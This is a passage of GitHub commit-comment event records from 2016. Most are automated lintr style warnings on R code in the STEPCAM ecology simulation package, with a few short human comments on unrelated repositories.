operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n"}},"created_at":"2016-09-18T20:28:48Z"}
{"id":"4580575296","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"thisisniall/dsp"},"payload":{"comment":{"id":19072154,"position":null,"line":null,"path":null,"commit_id":"040e2e0abacc236c6823ae1e47cb72d0527ed7bd","created_at":"2016-09-18T20:31:28Z","updated_at":"2016-09-18T20:31:28Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @thisisniall \r\n\r\nGreat work on advanced Python! Some comments:\r\n- Q1: The degree counts don't agree with a manual inspection, which yields `{'md': 1, 'ma': 1, 'scd': 6, 'bsed': 1, 'phd': 31, '0': 1, 'mph': 2, 'ms': 2, 'jd': 1}`.\r\n- Yes there are typos in the input file. This happens often, and there is nothing wrong with correcting for them in the code (better than editing the given file, which might introduce new typos or lead to confusion later or simply be impractical).\r\n\r\n👍 "}},"created_at":"2016-09-18T20:31:28Z"}
{"id":"4580576343","type":"CommitCommentEvent","actor":{"login":"DienoX"},"repo":{"name":"javilonas/Lonas_KL-SM-G901F"},"payload":{"comment":{"id":19072156,"position":null,"line":null,"path":null,"commit_id":"0667c57d8622b5430980206e75f76aa674a7fc6e","created_at":"2016-09-18T20:32:09Z","updated_at":"2016-09-18T20:32:09Z","body":"Please. Can you do base for kernel?"}},"created_at":"2016-09-18T20:32:09Z"}
{"id":"4580576851","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19072157,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-18T20:32:28Z","updated_at":"2016-09-18T20:32:28Z","body":"Paul GITHUB c'est comme ProNote il faut que tu le regarde tous les jour moi c'est ce que je fais.\r\n![ios_emoji_grinning_face](https://cloud.githubusercontent.com/assets/22102135/18618863/1a28d3e2-7db5-11e6-841d-532fb110aa31.png)\r\n"}},"created_at":"2016-09-18T20:32:28Z"}
{"id":"4580581666","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19072164,"position":null,"line":null,"path":null,"commit_id":"0e18e0dd9a1260bc685daeab5a021d6643f34a42","created_at":"2016-09-18T20:35:42Z","updated_at":"2016-09-18T20:35:42Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(disp_vals[i], filt_vals[i], comp_vals[i])\n    ^~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:91:17:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:92:17:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:13:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:95:16:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:97:15:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:98:15:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:101:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:101:15:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:102:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:102:15:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:104:21:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:3:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:25:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:16:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:1:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L113) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/0e18e0dd9a1260bc685daeab5a021d6643f34a42/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[, 1]\n    